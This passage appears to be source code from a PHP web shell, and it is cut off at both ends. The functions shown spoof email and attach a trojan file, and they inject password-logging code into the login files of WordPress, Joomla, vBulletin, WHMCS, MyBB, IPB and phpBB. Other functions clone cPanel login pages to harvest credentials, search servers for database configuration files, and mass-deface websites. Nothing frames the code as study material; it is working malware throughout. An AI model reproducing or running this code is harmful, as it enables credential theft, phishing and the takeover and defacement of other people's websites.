'; $table = array( 'td1' => array('color' => 'FFFFFF', 'tdName' => 'Mail To : ', 'inputName' => 'mail_to', 'inputValue' => 'target@fbi.gov', 'inputSize' => '60','placeholder' => true), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'From : ', 'inputName' => 'mail_from', 'inputValue' => 'sec@google.com', 'inputSize' => '60', 'placeholder' => true), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Subject : ', 'inputName' => 'mail_subject', 'inputValue' => 'your site hacked by me', 'inputSize' => '60'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Attach File : ', 'inputName' => 'mail_attach', 'inputValue' => $GLOBALS['cwd'].'trojan.exe', 'inputSize' => '60'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Count Mail : ', 'inputName' => 'count_mail', 'inputValue' => '1', 'inputSize' => '60') ); create_table($table); echo '

Message:

'; if (isset($_POST['alfa4']) && ($_POST['alfa4'] == '>>')) { $mail_to = $_POST['alfa1']; $mail_from = $_POST['alfa2']; $mail_subject = $_POST['alfa3']; $mail_content = $_POST['alfa5']; $count_mail = (int)$_POST['alfa6']; $mail_attach = $_POST['alfa7']; if (filter_var($mail_to, FILTER_VALIDATE_EMAIL)) { if (!empty($mail_attach) && @is_file($mail_attach)) { $file = $mail_attach; $content = __read_file($file); $content = chunk_split(__ZW5jb2Rlcg($content)); $uid = md5(uniqid(time())); $filename = basename($file); $headers = "From: ".$mail_from." <".$mail_from.">\r\n"; $headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n"; $headers .= "Reply-To: ".$mail_from."\r\n"; $headers .= "Content-Type: multipart/mixed; boundary=\"".$uid."\"\r\n\r\n"; $headers .= 'MIME-Version: 1.0' . "\r\n"; $headers .= 'X-Mailer: php' . "\r\n"; $mail_content = "--".$uid."\r\n"; $mail_content .= "Content-type:text/plain; charset=iso-8859-1\r\n"; $mail_content .= "Content-Transfer-Encoding: 7bit\r\n\r\n"; $mail_content .= $mail_content."\r\n\r\n"; $mail_content .= "--".$uid."\r\n"; $mail_content .= "Content-Type: application/octet-stream; name=\"".$filename."\"\r\n"; $mail_content .= "Content-Transfer-Encoding: base64\r\n"; $mail_content .= "Content-Disposition: attachment; filename=\"".$filename."\"\r\n\r\n"; $mail_content .= $content."\r\n\r\n"; $mail_content .= "--".$uid."--"; } else { $headers = "From: " . $mail_from. " ( ".$mail_from." ) \r\n"; $headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n"; $headers .= 'Reply-To: '.$mail_from.'' . "\r\n"; $headers .= 'Content-type: text/html; charset=utf-8' . "\r\n"; $headers .= 'MIME-Version: 1.0' . "\r\n"; $headers .= 'X-Mailer: php' . "\r\n"; } if (empty($count_mail) || $count_mail < 1) { $count_mail = 1; } if (!empty($mail_from)) { echo __pre(); for ($i = 1;$i <= $count_mail;$i++) { if (@mail($mail_to, $mail_subject, $mail_content, $headers)) { echo("
Sent -> $mail_to
"); } } } else { __alert("Invalid Mail From !"); } } else { __alert("Invalid Mail To !"); } } echo('
'); alfafooter(); } function alfaziper() { alfahead(); AlfaNum(8, 9, 10); echo '

| Compressor |

Dir/File:
Save Dir:

'; if (isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')) { $dirzip = $_POST['alfa3']; $zipfile = $_POST['alfa4']; if ($GLOBALS['sys'] != 'unix' && _alfa_can_runCommand(true, true)) { alfaEx("powershell Compress-Archive -Path '".addslashes($dirzip)."' -DestinationPath '".addslashes(basename($zipfile))."'"); echo __pre().'

Done -> '.$zipfile.'

'; } elseif ($GLOBALS['sys'] == 'unix' && _alfa_can_runCommand(true, true)) { alfaEx("cd '".addslashes(dirname($zipfile))."';zip -r '".addslashes(basename($zipfile))."' '".addslashes($dirzip)."'"); echo __pre().'

Done -> '.$zipfile.'

'; } elseif (class_exists('ZipArchive')) { if (__alfaziper($dirzip, $zipfile)) { echo __pre().'

Success...!
'.$zipfile.'

'; } else { echo __pre().'

ERROR!!!...

'; } } } echo '
'; alfafooter(); } function __alfaziper($source, $destination) { if (!extension_loaded('zip') || !file_exists($source)) { return false; } $zip = new ZipArchive(); if (!$zip->open($destination, ZIPARCHIVE::CREATE)) { return false; } $source = str_replace('\\', '/', realpath($source)); if (is_dir($source) === true) { $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST); foreach ($files as $file) { $file = str_replace('\\', '/', $file); if (in_array(substr($file, strrpos($file, '/') + 1), array('.','..'))) { continue; } $file = realpath($file); if (is_dir($file) === true) { $zip->addEmptyDir(str_replace($source.'/', '', $file.'/')); } elseif (is_file($file) === true) { $zip->addFromString(str_replace($source.'/', '', $file), file_get_contents($file)); } } } elseif (is_file($source) === true) { $zip->addFromString(basename($source), file_get_contents($source)); } return $zip->close(); } function alfadeziper() { alfahead(); AlfaNum(8, 9, 10); echo '

| DeCompressor |

File:
Extract To:

'; if (isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')) { $dirzip = $_POST['alfa3']; $zipfile = $_POST['alfa4']; if (@!is_dir($zipfile)) { @mkdir($zipfile, 0777, true); } $finfo = ""; $file_type = ""; if (function_exists('finfo_open')) { $finfo = @finfo_open(FILEINFO_MIME_TYPE); $file_type = @finfo_file($finfo, $dirzip); @finfo_close($finfo); } else { if ($GLOBALS['sys'] == 'unix' && _alfa_can_runCommand(true, true)) { $file_type = alfaEx('file -b --mime-type ' . $dirzip); } } if ($GLOBALS['sys'] != 'unix' && _alfa_can_runCommand(true, true)) { alfaEx("powershell expand-archive -path '".addslashes($dirzip)."' -destinationpath '".addslashes(basename($zipfile))."'"); echo __pre().'

Done -> '.$zipfile.'

'; } elseif ($GLOBALS['sys'] == 'unix' && !empty($file_type) && _alfa_can_runCommand(true, true) && (strlen(alfaEx('which unzip')) > 0 || strlen(alfaEx('which tar')) > 0 || strlen(alfaEx('which gunzip')) > 0)) { switch ($file_type) { case 'application/zip': alfaEx("cd '".addslashes($zipfile)."';unzip '".addslashes($dirzip)."'"); break; case 'application/x-tar': case 'application/x-gzip': case 'application/x-gtar': if (strstr(basename($dirzip), ".tar.gz") || strstr(basename($dirzip), ".tar")) { alfaEx("cd '".addslashes($zipfile)."';tar xzf '".addslashes($dirzip)."'"); } else { alfaEx("cd '".addslashes($zipfile)."';gunzip '".addslashes($dirzip)."'"); } break; } echo __pre().'

Done -> '.$zipfile.' [ View Folder ]

'; } elseif (class_exists('ZipArchive')) { $itsok = false; if (emtpy($file_type)) { $file_type = "application/zip"; } switch ($file_type) { case 'application/zip': $zip = new ZipArchive(); $res = $zip->open($dirzip); if ($res) { $zip->extractTo($zipfile); $zip->close(); $itsok = true; } break; case 'application/x-tar': case 'application/x-gzip': case 'application/x-gtar': if (strstr(basename($dirzip), ".tar.gz")) { $new_file = $zipfile .'/'. basename($dirzip); @copy($dirzip, $new_file); $new_tar = str_replace(".tar.gz", ".tar", $new_file); try { $p = new PharData($new_file); $p->decompress(); $phar = new PharData($new_tar); $phar->extractTo($zipfile); @unlink($new_file); @unlink($new_tar); $itsok = true; } catch (Exception $e) { } } else { try { $phar = new PharData($dirzip); $phar->extractTo($zipfile); $itsok = true; } catch (Exception $e) { } } break; } if ($itsok) { echo __pre().'

Success...!
'.$zipfile.' [ View Folder ]

'; } else { echo __pre().'

ERROR!!!...

'; } } } echo '
'; alfafooter(); } function alfacmshijacker() { alfahead(); AlfaNum(5, 6, 7, 8, 9, 10); echo '

| Cms Hijacker |


CMS: "); echo ' Path installed cms: SaveTo:

'; $cms = $_POST['alfa1']; $saveto = $_POST['alfa2']; $cmspath = $_POST['alfa4']; if (!empty($cms) and !empty($saveto) and $_POST['alfa4'] and $_POST['alfa3'] == '>>') { echo __pre(); alfaHijackCms($cms, $cmspath, $saveto); } echo '
'; alfafooter(); } function alfaHijackCms($cms, $cmspath, $saveto) { switch ($cms) { case "vb": hijackvBulletin($cmspath, $saveto); break; case "wp": hijackwp($cmspath, $saveto); break; case "jom": hijackJoomla($cmspath, $saveto); break; case "whmcs": hijackWhmcs($cmspath, $saveto); break; case "mybb": hijackMybb($cmspath, $saveto); break; case "ipb": hijackIPB($cmspath, $saveto); break; case "phpbb": hijackPHPBB($cmspath, $saveto); break; default: echo "error!"; break; } } function hijackvBulletin($path, $saveto) { $code = '$alfa_username = strtolower($vbulletin->GPC["vb_login_username"]);$alfa_password = $vbulletin->GPC["vb_login_password"];$alfa_file = "{saveto_path}";$sql_query = $vbulletin->db->query_read("SELECT * FROM " . TABLE_PREFIX . "user WHERE `username`=\'" . $alfa_username . "\'");while($row = $vbulletin->db->fetch_array($sql_query)){if(strlen($alfa_password) > 1 AND strlen($alfa_username) > 1){$fp1 = @fopen($alfa_file, "a+");@fwrite($fp1, $alfa_username . \' : \' . $alfa_password." (" . $row["email"] . ")\n");@fclose($fp1); $f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}'; $clearpw = 'defined(\'DISABLE_PASSWORD_CLEARING\')'; $code = str_replace('{saveto_path}', $saveto, $code); $login = $path."/login.php"; $class = $path."/includes/class_bootstrap.php"; $dologin = 'do_login_redirect();'; $evil_login = "\t".$code."\n\t".$dologin; $evil_class = "true"; if ((@is_file($login) and @is_writable($login)) || (@is_file($class) and @is_writable($class))) { $data_login = @file_get_contents($login); $data_class = @file_get_contents($class); if (strstr($data_login, $dologin) || strstr($data_class, $clearpw)) { $login_replace = str_replace($dologin, $evil_login, $data_login); $class_replace = str_replace($clearpw, $evil_class, $data_class); @file_put_contents($login, $login_replace); @file_put_contents($class, $class_replace); hijackOutput(0, $saveto); } else { hijackOutput(1); } } else { hijackOutput(1); } } function hijackwp($path, $saveto) { $code = '$alfa_file="{saveto_path}";$fp = fopen($alfa_file, "a+");fwrite($fp, $_POST[\'log\']." : ".$_POST[\'pwd\']." (".($user->user_email).")\n");fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);'; $redirect_wp = '#if[ ]{0,}\([ ]{0,}![ ]{0,}is_wp_error\([ ]{0,}\$user[ ]{0,}\)[ ]{0,}&&[ ]{0,}![ ]{0,}\$reauth[ ]{0,}\)[ ]{0,}{#'; $code = str_replace('{saveto_path}', $saveto, $code); $login = $path."/wp-login.php"; if (@is_file($login) and @is_writable($login)) { $data_login = @file_get_contents($login); if (@preg_match($redirect_wp, $data_login, $match)) { $evil_login = "\t".$match[0]."\n\t".$code; $login_replace = @preg_replace($redirect_wp, $evil_login, $data_login); @file_put_contents($login, $login_replace); hijackOutput(0, $saveto); } else { hijackOutput(1); } } else { hijackOutput(1); } } function hijackJoomla($path, $saveto) { $code = '$_POST[\'username\'],\'password\'=>$_POST[\'passwd\']);$Alfa_options = array();$Alfa_response = $Alfa_auth->authenticate($Alfa_data, $Alfa_options);if($Alfa_response->status == 1){$alfa_file="{saveto_path}";$fp=@fopen($alfa_file,"a+");@fwrite($fp, $Alfa_response->username.":".$_POST[\'passwd\']." ( ".$Alfa_response->email." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}?>'; $code = str_replace('{saveto_path}', $saveto, $code); $comp = $path."/administrator/components/com_login/"; if (@is_file($comp."/login.php")) { $login = $comp."/login.php"; } elseif (@is_file($comp."/admin.login.php")) { $login = $comp."/admin.login.php"; } else { $login = ''; } if (@is_file($login) and @is_writable($login) and $login != '') { $data_login = @file_get_contents($login); $evil_login = $code."\n".$data_login; @file_put_contents($login, $evil_login); hijackOutput(0, $saveto); } else { hijackOutput(1); } } function hijackWhmcs($path, $saveto) { $code = ' 0 ){$row = mysqli_fetch_array($alfa_query);$allow = true;if(!$admin){$__salt = explode(\':\', $row[\'password\']);$__encPW = md5($__salt[1].$_POST[\'password\']).\':\'.$__salt[1];if($row[\'password\'] == $__encPW){$allow = true;$row[\'username\'] = $row[\'email\'];}else{$allow = false;}}if($allow){$fp = @fopen($alfa_file, "a+");@fwrite($fp, $row[\'username\'] . \' : \' . $alfa_pw." (" . $row["email"] . ") : ".($admin ? \'is_admin\' : \'is_user\')."\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);}}}}?>'; $code = str_replace('{saveto_path}', $saveto, $code); $conf = $path."/configuration.php"; if (@is_file($conf) and @is_writable($conf)) { $data_conf = @file_get_contents($conf); if (!strstr($data_conf, '?>')) { $code = '?>'.$code; } $evil_conf = $data_conf."\n".$code; @file_put_contents($conf, $evil_conf); hijackOutput(0, $saveto); } else { hijackOutput(1); } } function hijackMybb($path, $saveto) { $code = '$alfa_q = $db->query("SELECT `email` FROM ".TABLE_PREFIX."users WHERE `username` = \'".$user[\'username\']."\'");$alfa_fetch = $db->fetch_array($alfa_q);$alfa_file = "{saveto_path}";$fp = @fopen($alfa_file, "a+");@fwrite($fp, $user[\'username\']." : ". $user[\'password\']." ( ".$alfa_fetch[\'email\']." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);'; $find = '$loginhandler->complete_login();'; $code = str_replace('{saveto_path}', $saveto, $code); $login = $path."/member.php"; $evil_login = "\t".$code."\n\t".$find; if (@is_file($login) and @is_writable($login)) { $data_login = @file_get_contents($login); if (strstr($data_login, $find)) { $login_replace = str_replace($find, $evil_login, $data_login); @file_put_contents($login, $login_replace); hijackOutput(0, $saveto); } else { hijackOutput(1); } } else { hijackOutput(1); } } function hijackIPB($path, $saveto) { $code = '$Alfa_q = $this->DB->buildAndFetch(array(\'select\' => \'email\', \'from\' => \'members\', \'where\' => \'name="\'.$username.\'" OR email="\'.$email.\'"\'));$Alfa_file = "{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $_POST[\'ips_username\'].\' : \'.$_POST[\'ips_password\'].\' ( \'.$Alfa_q[\'email\'].\' )\'."\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);'; $find = 'unset( $member[\'plainPassword\'] );'; $code = str_replace('{saveto_path}', $saveto, $code); $login = $path."/admin/sources/handlers/han_login.php"; $evil_login = "\t".$find."\n\t".$code; if (@is_file($login) and @is_writable($login)) { $data_login = @file_get_contents($login); if (strstr($data_login, $find)) { $login_replace = str_replace($find, $evil_login, $data_login); @file_put_contents($login, $login_replace); hijackOutput(0, $saveto); } else { hijackOutput(1); } } else { hijackOutput(1); } } function hijackPHPBB($path, $saveto) { $code = '$Alfa_u = request_var(\'username\', \'\');$Alfa_p = request_var(\'password\', \'\');if($Alfa_u != \'\' AND $Alfa_p != \'\'){$Alfa_response = $auth->login($Alfa_u,$Alfa_p);if($Alfa_response[\'status\'] == LOGIN_SUCCESS){$Alfa_file ="{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $Alfa_u." : ".$Alfa_p. " ( ".$Alfa_response[\'user_row\'][\'user_email\']." )\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}'; $find = 'case \'login\':'; $code = str_replace('{saveto_path}', $saveto, $code); $login = $path."/ucp.php"; $evil_login = "\t".$find."\n\t".$code; if (@is_file($login) and @is_writable($login)) { $data_login = @file_get_contents($login); if (strstr($data_login, $find)) { $login_replace = str_replace($find, $evil_login, $data_login); @file_put_contents($login, $login_replace); hijackOutput(0, $saveto); } else { hijackOutput(1); } } else { hijackOutput(1); } } function hijackOutput($c = 0, $p = '') { echo($c == 0 ? "
Success --> path: $p
" : '
Error in inject code !
'); } function Alfa_StrSearcher($dir, $string, $ext, $e, $arr = array()) { if (@is_dir($dir)) { $files = @scandir($dir); foreach ($files as $key => $value) { $path = @realpath($dir. DIRECTORY_SEPARATOR .$value); if (!@is_dir($path)) { if ($ext != '*') { $f = basename($path); $f = explode('.', $f); $f = end($f); if ($f != $ext) { continue; } } if ($e == 'str') { $content = @file_get_contents($path); if (strpos($content, $string) !== false) { echo str_replace('\\', '/', $path) . "
"; } } else { if (strstr($value, $string)) { echo str_replace('\\', '/', $path) . "
"; } } $results[] = $path; } elseif ($value != "." && $value != "..") { Alfa_StrSearcher($path, $string, $ext, $e, $results); $results[] = $path; } } } } function alfafakepage() { alfahead(); AlfaNum(9, 10); echo '

| Host Manager Fake page |


Panel:
"); echo '
Clone page:
Fake page root:
Inject to:
Bind on:
Log To:
Count of Invalid login:

'; $clone_page = $_POST['alfa1']; $fake_root = $_POST['alfa2']; $logto = $_POST['alfa4']; $panel = $_POST['alfa5']; $inject_to = $_POST['alfa6']; $bind_on = $_POST['alfa7']; $count = $_POST['alfa8']; if (!empty($clone_page) && !empty($fake_root) && !empty($logto) && !empty($inject_to) && !empty($bind_on) && $_POST['alfa3'] == '>>') { echo __pre(); $target = $clone_page; $curl = new AlfaCURL(); $source_page = $curl->Send($target); if (!empty($source_page)) { $matched_form = ""; if ($panel == "cpanel") { if (preg_match('##', $source_page, $match)) { $matched_form = $match[0]; } } else { if (preg_match('##', $source_page, $match)) { $matched_form = $match[0]; } } if (!empty($matched_form)) { $fake = ""; $pwd = str_replace($_SERVER["DOCUMENT_ROOT"], '', $fake_root); $uri = str_replace($_SERVER["DOCUMENT_ROOT"], '', $inject_to); if ($panel == "cpanel") { $port = "2083"; } else { $target = str_replace(array("http://", "https://"), "", $target); $port = explode(":", $target); $port = $port[1]; } if (substr($uri, 0, 1) == "/") { $uri = substr($uri, 1); } $uri = $_SERVER["HTTP_ORIGIN"] . '/' . str_replace("index.php", "", $uri) . '?:' . $port; $log_url = $_SERVER["HTTP_ORIGIN"] . $pwd . '/log.php'; if ($panel == "cpanel") { $form = '
'; } else { $form = ''; } $fake = str_replace($matched_form, $form, $source_page); if (@!is_dir($fake_root)) { @mkdir($fake_root, 0777, true); } $cookie_name = "alfa_fakepage_counter" . rand(9999, 99999); $post_user = 'user'; $post_pass = 'pass'; $resp_code = 'if(empty($user)){http_response_code(400);echo json_encode(array("message" => "no_username"));}else{http_response_code(401);}'; if ($panel != "cpanel") { $post_user = 'username'; $post_pass = 'password'; $resp_code = '@header("Location: ".$_SERVER[\'HTTP_REFERER\']);'; } $cpanel_log = ''.$count.'){@header("Location: /");exit;}@setcookie("'.$cookie_name.'", ((int)$_COOKIE["'.$cookie_name.'"] + 1), $cook_time, "/");$fp = @fopen("'.$logto.'", "a+");@fwrite($fp, $user . " : " . $pass . "\n");fclose($fp);sleep(3);'.$resp_code.'exit;}?>'; @file_put_contents($fake_root.'/log.php', $cpanel_log); if ($panel == "cpanel") { $fake = preg_replace(array('##', '##', '# #'), array('', '', ''), $fake); } @file_put_contents($fake_root.'/index.php', $fake); $inject_code = ''; $bind_on_code = ''; @file_put_contents($inject_to, $inject_code . "\n" .@file_get_contents($inject_to)); @file_put_contents($bind_on, $bind_on_code . "\n" .@file_get_contents($bind_on)); echo "success...!"; } else { echo "failed...!"; } } else { echo("
Cannot open the target...!
"); } } echo '
'; alfafooter(); } function alfaarchive_manager() { alfahead(); $file = $_POST['alfa2']; if (!file_exists($file)) { $file = $GLOBALS['cwd']; } $rand_id = rand(9999, 999999); echo '

| Archive Manager |

'; echo '
Archive file:

'; if ($_POST['alfa5'] == '>>') { //echo __pre(); echo '
'; echo '
'; __alfa_open_archive_file($file, $rand_id); echo '
'; } echo '
'; alfafooter(); } function __alfa_open_archive_file($arch, $base_id = 0) { try { $files = array(); $dirs = array(); $archive = new PharData($arch); foreach ($archive as $file) { $file_modify = @date('Y-m-d H:i:s', @filemtime($file->getPathname())); if ($file->isDir()) { $dirs[] = array("name" => $file->getFileName(), "path" => $file->getPathname(), "type" => "dir", "modify" => $file_modify); } else { $file_size = @filesize($file->getPathname()); $files[] = array("name" => $file->getFileName(), "path" => $file->getPathname(), "type" => "file", "modify" => $file_modify, "size" => $file_size); } } function __alfa_open_archive_usort($a, $b) { return strcmp(strtolower($a['name']), strtolower($b['name'])) * 1; } usort($dirs, "__alfa_open_archive_usort"); usort($files, "__alfa_open_archive_usort"); $files = array_merge($dirs, $files); echo ''; $icon = ''; echo ''; foreach ($files as $file) { $icon = ''; if ($file["type"] == "dir") { echo ''; } else { echo ""; } } echo '
NameSizeModifyActions
'.$icon.'| .. |dir--
'.$icon.'| '.$file["name"].' |dir'.$file["modify"].'-
".$icon."".$file["name"]."".alfaSize($file["size"])."".$file["modify"]."-
'; } catch (Exception $e) { echo("0"); } } function alfaopen_archive_dir() { $dir = $_POST["alfa1"]; $base_id = $_POST["alfa2"]; __alfa_open_archive_file($dir, $base_id); } function alfaconfig_grabber() { alfahead(); echo '

| Config Grabber |

'; echo '
Dir: Ext: [ * = all Ext ]

'; $dir = $_POST['alfa2']; $ext = $_POST['alfa3']; if ($_POST['alfa5'] == '>>') { echo __pre(); Alfa_ConfigGrabber($dir, $ext); } echo '
'; alfafooter(); } function Alfa_ConfigGrabber($dir, $ext) { $pattern = "#define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOST(?:'|\")[ ]{0,}|define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOSTNAME(?:'|\")[ ]{0,}|config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")password(?:'|\")\]|(?:'|\")database(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")|(?:'|\")(mysql|database)(?:'|\")[ ]{0,}=>[ ]{0,}array|db_name|db_user|db_pass|db_server|db_host|dbhost|dbname|dbuser|dbpass|database_name|database_user|database_pass|mysql_user|mysql_pass|mysqli_connect|mysql_connect|new[ ]{0,}mysqli#i"; $db_files = array("wp-config.php","configure.php","config.inc.php","configuration.php","config.php","conf.php","dbclass.php","class_core.php","dist-configure.php", "settings.php", "conf_global.php", "db.php", "connect.php", "confing.db.php", "config.db.php", "database.php"); if (@is_readable($dir)) { $globFiles = @glob("$dir/*.$ext"); $globDirs = @glob("$dir/*", GLOB_ONLYDIR); $blacklist = array(); foreach ($globDirs as $dir) { if (!@is_readable($dir) || @is_link($dir)) { continue; } @Alfa_ConfigGrabber($dir, $ext); } foreach ($globFiles as $file) { $filee = @file_get_contents($file); if (preg_match($pattern, $filee)) { echo "
$file [ View file ]
"; } } } } function alfasearcher() { alfahead(); echo '

| Searcher |

| Find Readable Or Writable Files | | Find Files By Name |

'; if (isset($_POST['alfa1']) && $_POST['alfa1'] == 'file') { echo '
| Find Readable Or Writable Files |


Method: Dir: Ext: [ * = all Ext ]

'; $dir = $_POST['alfa2']; $ext = $_POST['alfa3']; $method = $_POST['alfa4']; if ($_POST['alfa5'] == '>>') { echo __pre(); if (substr($dir, -1) == '/') { $dir = substr($dir, 0, -1); } Alfa_Searcher($dir, trim($ext), $method); } } if ($_POST['alfa1'] == 'str') { echo '
| Find Files By Name / Find String In Files |


Method: String: Dir: Ext: [ * = all Ext ]

'; $dir = $_POST['alfa2']; $string = $_POST['alfa3']; $ext = $_POST['alfa5']; if (!empty($string) and !empty($dir) and $_POST['alfa4'] == '>>') { echo __pre(); Alfa_StrSearcher($dir, $string, $ext, $_POST['alfa6']); } } echo '
'; alfafooter(); } function alfaMassDefacer() { alfahead(); AlfaNum(5, 6, 7, 8, 9, 10); echo "

| Mass Defacer |

>');return false;\" method='post'>"; echo '
Deface Method: Mass dir: DefPage:

'; $dir = $_POST['alfa1']; $defpage = $_POST['alfa2']; $method = $_POST['alfa3']; $fCurrent = $GLOBALS['__file_path']; if ($_POST['alfa4'] == '>>') { if (!empty($dir)) { if (@is_dir($dir)) { if (@is_readable($dir)) { if (@is_file($defpage)) { if ($dh = @opendir($dir)) { echo __pre(); while (($file = @readdir($dh)) !== false) { if ($file == '..' || $file == '.') { continue; } $newfile = $dir.$file; if ($fCurrent == $newfile) { continue; } if (@is_dir($newfile)) { Alfa_ReadDir($newfile, $method, $defpage); } else { if (!@is_writable($newfile)) { continue; } if (!@is_readable($newfile)) { continue; } Alfa_Rewriter($newfile, $file, $defpage, $method); } } closedir($dh); } else { __alert('Error In OpenDir...'); } } else { __alert('DefPage File NotFound...'); } } else { __alert('Directory is not Readable...'); } } else { __alert('Mass Dir is Invalid Dir...'); } } else { __alert('Dir is Empty...'); } } echo '
'; alfafooter(); } function Alfa_ReadDir($dir, $method = '', $defpage = '') { if (!@is_readable($dir)) { return false; } if (@is_dir($dir)) { if ($dh = @opendir($dir)) { while (($file = readdir($dh)) !== false) { if ($file == '..' || $file == '.') { continue; } $newfile = $dir.'/'.$file; if (@is_readable($newfile) && @is_dir($newfile)) { Alfa_ReadDir($newfile, $method, $defpage); } if (@is_file($newfile)) { if (!@is_readable($newfile)) { continue; } Alfa_Rewriter($newfile, $file, $defpage, $method); } } closedir($dh); } } } function Alfa_Rewriter($dir, $file, $defpage, $m = 'index') { if (!@is_writable($dir)) { return false; } if (!@is_readable($dir)) { return false; } $defpage = @file_get_contents($defpage); if ($m == 'index') { $indexs = array('index.php','index.htm','index.html','default.asp','default.aspx','index.asp','index.aspx','index.js'); if (in_array(strtolower($file), $indexs)) { @file_put_contents($dir, $defpage); echo @is_file($dir) ? $dir."DeFaced...
" : ''; } } elseif ($m == 'all') { @file_put_contents($dir, $defpage); echo @is_file($dir) ? $dir." DeFaced...
" : ''; } } function alfaGetDisFunc() { alfahead(); echo '
'; $disfun = @ini_get('disable_functions'); $s = explode(',', $disfun); $f = array_unique($s); echo '

Disable Functions
';
  $i = 1;
  foreach ($f as $s) {
    $s = trim($s);
    if (function_exists($s) || !is_callable($s)) {
      continue;
    }
    echo '';
    echo '';
    $i++;
  }
  echo '
#Func Name
'.$i.''.$s.'
'; echo '
'; alfafooter(); } function Alfa_Create_A_Tag($action, $vals) { $nulls = array(); foreach ($vals as $key => $val) { echo '| '.$key.' | '; unset($nulls); } } function Alfa_Searcher($dir, $ext, $method) { if (@is_readable($dir)) { if ($method == 'all') { $ext = '*'; } if ($method == 'dirs') { $ext = '*'; } $globFiles = @glob("$dir/*.$ext"); $globDirs = @glob("$dir/*", GLOB_ONLYDIR); $blacklist = array(); foreach ($globDirs as $dir) { if (!@is_readable($dir) || @is_link($dir)) { continue; } @Alfa_Searcher($dir, $ext, $method); } switch ($method) { case "files": foreach ($globFiles as $file) { if (@is_writable($file)) { echo "$file
"; } } break; case "dirs": foreach ($globFiles as $file) { if (@is_writable(dirname($file)) && !in_array(dirname($file), $blacklist)) { echo dirname($file).'
'; $blacklist[] = dirname($file); } } break; case "all": foreach ($globFiles as $file) { echo $file.'
'; } break; } unset($blacklist); } } function AlfaiFrameCreator($f, $width = '100%', $height = '600px') { return(''); } class AlfaCURL { public $headers; public $user_agent; public $compression; public $cookie_file; public $proxy; public $path; public $ssl = true; public $curl_status = true; public function __construct($cookies = false, $compression = 'gzip', $proxy = '') { if (!extension_loaded('curl')) { $curl_status = false; return false; } $this->headers[] = 'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg'; $this->headers[] = 'Connection: Keep-Alive'; $this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8'; $this->user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36)'; $this->path = ALFA_TEMPDIR.'/Alfa_cookies.txt'; $this->compression = $compression; $this->proxy = $proxy; $this->cookies = $cookies; if ($this->cookies) { $this->cookie($this->path); } } public function cookie($cookie_file) { if (_alfa_file_exists($cookie_file, false)) { $this->cookie_file = $cookie_file; } else { @fopen($cookie_file, 'w') or die($this->error('The cookie file could not be opened.')); $this->cookie_file = $cookie_file; @fclose($this->cookie_file); } } public function Send($url, $method = "get", $data = "") { if (!$this->curl_status) { return false; } $process = curl_init($url); curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers); curl_setopt($process, CURLOPT_HEADER, 0); curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent); curl_setopt($process, CURLOPT_RETURNTRANSFER, 1); curl_setopt($process, CURLOPT_ENCODING, $this->compression); curl_setopt($process, CURLOPT_TIMEOUT, 30); if ($this->ssl) { curl_setopt($process, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($process, CURLOPT_SSL_VERIFYHOST, false); } if ($this->cookies) { curl_setopt($process, CURLOPT_COOKIEFILE, $this->path); curl_setopt($process, CURLOPT_COOKIEJAR, $this->path); } if ($this->proxy) { curl_setopt($process, CURLOPT_PROXY, $this->proxy); } if ($method == 'post') { curl_setopt($process, CURLOPT_POSTFIELDS, $data); curl_setopt($process, CURLOPT_POST, 1); curl_setopt($process, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded')); } $return = @curl_exec($process); curl_close($process); return $return; } public function error($error) { echo "
cURL Error
$error
"; die; } } function getConfigHtml($cms) { $content = ''; $cms_array = array("wp" => "WordPress", "vb" => "vBulletin", "whmcs" => "Whmcs", "joomla" => "Joomla", "phpnuke" => "PHPNuke","phpbb" => "PHPBB","mybb" => "MyBB","drupal" => "Drupal","smf" => "SMF"); $content .= "
Cms:
Path(installed cms/Config):
"; $content .= "
